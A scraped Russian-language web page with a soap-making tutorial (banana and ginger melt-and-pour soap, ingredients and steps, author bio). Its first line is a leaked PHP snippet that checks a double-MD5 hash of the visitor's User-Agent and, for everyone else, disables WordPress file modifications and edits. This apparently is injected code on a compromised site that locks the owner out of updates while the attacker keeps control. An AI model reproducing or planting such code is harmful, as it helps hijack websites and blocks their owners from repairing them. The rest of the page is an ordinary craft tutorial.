if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс как сделать мыло с бананом и имбирем | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс как сделать мыло с бананом и имбирем

Банан + имбирь - довольно необычный состав для мыла, не считаете так? Давайте вместе разберемся в чем польза этих компонентов для кожи. Чем бананы полезны? Прежде всего витамином С

Банан + имбирь — доволь­но необыч­ный состав для мыла, не счи­та­е­те так? Давай­те вме­сте раз­бе­рем­ся в чем поль­за этих ком­по­нен­тов для кожи. Чем бана­ны полез­ны? Преж­де все­го вита­ми­ном С, кото­рый явля­ет­ся анти­ок­си­дан­том, т.е. замед­ля­ет про­цесс ста­ре­ния орга­низ­ма, предот­вра­ща­ет появ­ле­ние ран­них мор­щин. Имбирь — актив­но борет­ся с мик­ро­ба­ми и укреп­ля­ет имму­ни­тет. Так­же имбирь дей­ству­ет как анти­ок­си­дант и тем самым акти­ви­зи­ру­ет реге­не­ра­цию кле­ток кожи и не поз­во­ля­ет ей преж­де­вре­мен­но ста­реть. Он не толь­ко тони­зи­ру­ет кожу, но и борет­ся с ее вос­па­ле­ни­ем. Имбирь спо­соб­ству­ет зажив­ле­нию ранок, пры­щей и даже фурун­ку­лов на коже. Полу­ча­ем двой­ной эффект от мыла! А теперь я напи­шу как его приготовить.

Необ­хо­ди­мо иметь:

  • 100 гр. про­зрач­ной осно­вы для мыла
  • жел­тый краситель
  • любую фор­му на кусо­чек мыла
  • диок­сид титана
  • моло­тый имбирь (суше­ный)
  • бана­но­вые ароматизаторы
  • Спирт меди­цин­ский
  • посу­да для плав­ле­ния основы,
  • дере­вян­ную палоч­ку для размешиваний

Про­цесс при­го­тов­ле­ния:

  1. Основ­ной ингре­ди­ент — осно­ву для мыла рас­то­пить, влить туда немно­го тита­на, чтоб мыло было мато­вым, и немнож­ко кра­си­те­ля. Доба­вить пол чай­ной лож­ки засу­шен­но­го пере­мо­ло­то­го имбиря.
    mas_kvadrat001_2
  2. Акку­рат­но взби­вать смесь мину­ты, на водя­ной бане.
    mas_kvadrat001_1
  3. Затем добавь­те бана­но­вый ароматизатор.
    mas_kvadrat001_3
  4. Залить смесь в фор­му, обдать спир­том, оста­вить, что­бы оно засты­ло, и достать из формы.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!